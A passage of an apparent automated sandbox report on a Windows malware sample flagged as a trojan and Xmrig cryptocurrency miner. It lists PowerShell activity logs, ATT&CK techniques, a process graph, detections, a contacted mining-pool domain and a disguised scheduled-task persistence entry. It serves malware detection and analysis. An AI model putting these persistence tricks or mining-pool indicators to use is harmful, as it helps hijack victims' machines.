    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3806D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65A3806D4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A364E70 GetVersionExW,0_2_00007FF65A364E70

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		1
    Exploitation for Privilege Escalation    		1
    Masquerading    		OS Credential Dumping1
    System Time Discovery    		Remote Services1
    Archive Collected Data    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		Boot or Logon Initialization Scripts11
    Process Injection    		31
    Virtualization/Sandbox Evasion    		LSASS Memory31
    Security Software Discovery    		Remote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading    		11
    Process Injection    		Security Account Manager1
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive1
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS31
    Virtualization/Sandbox Evasion    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Software Packing    		LSA Secrets1
    Application Window Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials2
    File and Directory Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync34
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428499 Sample: file.exe Startdate: 19/04/2024 Architecture: WINDOWS Score: 84 74 pool.hashvault.pro 2->74 78 Snort IDS alert for network traffic 2->78 80 Antivirus detection for URL or domain 2->80 82 Multi AV Scanner detection for submitted file 2->82 84 Yara detected Xmrig cryptocurrency miner 2->84 14 file.exe 6 2->14         started        16 cmd.exe 2->16         started        signatures3 process4 process5 18 cmd.exe 1 14->18         started        21 conhost.exe 16->21         started        signatures6 76 Very long command line found 18->76 23 cmd.exe 1 18->23         started        26 conhost.exe 18->26         started        process7 signatures8 90 Very long command line found 23->90 28 powershell.exe 30 23->28         started        32 conhost.exe 23->32         started        34 cmd.exe 1 23->34         started        process9 file10 72 C:\Users\user\AppData\...72etwork64476Man.cmd, DOS 28->72 dropped 92 Suspicious powershell command line found 28->92 36 cmd.exe 28->36         started        38 powershell.exe 37 28->38         started        41 powershell.exe 36 28->41         started        43 powershell.exe 28 28->43         started        signatures11 process12 signatures13 45 cmd.exe 36->45         started        48 conhost.exe 36->48         started        86 Loading BitLocker PowerShell Module 38->86 50 conhost.exe 38->50         started        52 conhost.exe 41->52         started        process14 signatures15 94 Very long command line found 45->94 54 powershell.exe 45->54         started        57 conhost.exe 45->57         started        59 cmd.exe 45->59         started        process16 signatures17 88 Suspicious powershell command line found 54->88 61 powershell.exe 54->61         started        64 powershell.exe 54->64         started        66 powershell.exe 54->66         started        process18 signatures19 96 Loading BitLocker PowerShell Module 61->96 68 conhost.exe 61->68         started        70 conhost.exe 64->70         started        process20

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe21%ReversingLabsWin64.Trojan.Pantera

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
    http://crl.microsoft0%URL Reputationsafe
    https://go.micro0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://oneget.orgX0%URL Reputationsafe
    http://www.microsoft.0%URL Reputationsafe
    https://oneget.org0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    pool.hashvault.pro
    		142.202.242.43
    		truefalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1760886154.00000217901C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1745848773.00000217803E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1760886154.00000217900A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000007.00000002.1745848773.00000217819D5000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmptrue
            • URL Reputation: malware
            		unknown
            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151FB2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://crl.microsoftpowershell.exe, 00000017.00000002.2153655366.000001DF16876000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.microsoft.co0powershell.exe, 00000008.00000002.1940934137.00000240B2EEF000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://go.micropowershell.exe, 00000007.00000002.1745848773.0000021780F42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.0000021520B53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF176D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBB94D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D01587000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151FB2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.microsoft.coQpowershell.exe, 00000018.00000002.2558198678.000001EBD2EE3000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://contoso.com/powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1760886154.0000021790092000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1745848773.0000021781C1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1745848773.00000217802E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1760886154.00000217901C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://oneget.orgXpowershell.exe, 00000007.00000002.1745848773.00000217819D5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000018.00000002.2316867721.000001EBBB5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBB5AC000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.microsoft.powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1938585602.00000240B2E15000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000007.00000002.1745848773.0000021780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843952409.000002409A8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151F971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF16E67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF16EAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D00441000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.1745848773.0000021780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843952409.000002409A8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151F971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF16E67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D00441000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://aka..winsvrpowershell.exe, 0000001B.00000002.2623470775.0000013D002DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                		low
                                https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://oneget.orgpowershell.exe, 00000007.00000002.1745848773.00000217819D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://crl.microsoftrpowershell.exe, 00000008.00000002.1839958983.0000024098D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown

                                    World Map of Contacted IPs

                                    No contacted IP infos

                                    General Information

                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1428499
                                    Start date and time:2024-04-19 03:18:05 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 44s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:29
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:file.exe
                                    Detection:MAL
                                    Classification:mal84.evad.mine.winEXE@40/31@1/0
                                    EGA Information:
                                    • Successful, ratio: 40%
                                    HCA Information:
                                    • Successful, ratio: 97%
                                    • Number of executed functions: 96
                                    • Number of non-executed functions: 94
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 1228 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 4428 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 7888 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    02:19:30Task SchedulerRun new task: OneNote 64476 path: C:\Users\user\AppData\Roaming\Network64476Man.cmd
                                    03:19:03API Interceptor156x Sleep call for process: powershell.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    pool.hashvault.proSecuriteInfo.com.Trojan.PWS.Siggen3.25256.942.20710.exeGet hashmaliciousExela Stealer, XmrigBrowse
                                    • 142.202.242.43
                                    SecuriteInfo.com.Trojan.Siggen27.52043.15111.6134.exeGet hashmaliciousXmrigBrowse
                                    • 142.202.242.43
                                    VTbtz4ZUY6.exeGet hashmaliciousXmrigBrowse
                                    • 142.202.242.45
                                    AQrfgZUJcl.exeGet hashmaliciousXmrigBrowse
                                    • 142.202.242.43
                                    SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exeGet hashmaliciousXmrigBrowse
                                    • 142.202.242.43
                                    gQZvXi6Osc.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                    • 142.202.242.43
                                    zLAr8hkDsu.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                    • 142.202.242.43
                                    udgE7Q3gs6.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                    • 142.202.242.43
                                    services64.exeGet hashmaliciousXmrigBrowse
                                    • 142.202.242.43
                                    hacn.exeGet hashmaliciousDiscord Token Stealer, Millenuim RAT, XmrigBrowse
                                    • 142.202.242.45

                                    ASNs

                                    No context

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):9713
                                    Entropy (8bit):4.93568648418653
                                    Encrypted:false
